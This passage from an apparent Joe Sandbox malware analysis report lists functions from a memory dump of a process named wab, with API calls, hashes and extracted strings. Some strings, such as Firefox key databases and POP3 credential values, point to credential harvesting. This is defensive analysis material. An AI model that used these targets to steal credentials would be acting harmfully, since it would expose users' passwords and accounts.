                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409213 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409239
                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                                                        • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                      • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                                      • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405972 Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                                                        • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                                                        • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                                                        • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2485852401-0
                                                                                                                                                                                                                      • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                                      • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B0EB Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                                                                                      • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                                      • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405BBD Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                      • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                                      • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040690E Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 85stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                      • String ID: C@$key3.db$key4.db
                                                                                                                                                                                                                      • API String ID: 581844971-2841947474
                                                                                                                                                                                                                      • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                                      • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B86F Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2126104762-0
                                                                                                                                                                                                                      • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                                      • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407065 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                                                                                      • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                                      • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004258DC Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 438COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                      • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                                      • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D7EA Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                      • String ID: user_pref("
                                                                                                                                                                                                                      • API String ID: 765841271-2487180061
                                                                                                                                                                                                                      • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                      • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004057FC Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                      • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A596 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                      • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                      • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408B27 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                        • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                                                        • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                                                      • strings, xrefs: 00408B98
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                      • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                      • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                      • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407E63 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                                        • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                        • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7651E430,?), ref: 00407F2F
                                                                                                                                                                                                                        • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                      • API String ID: 524865279-2190619648
                                                                                                                                                                                                                      • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                      • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409123 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                      • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                                      • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407446 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                      • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                                      • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443683 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
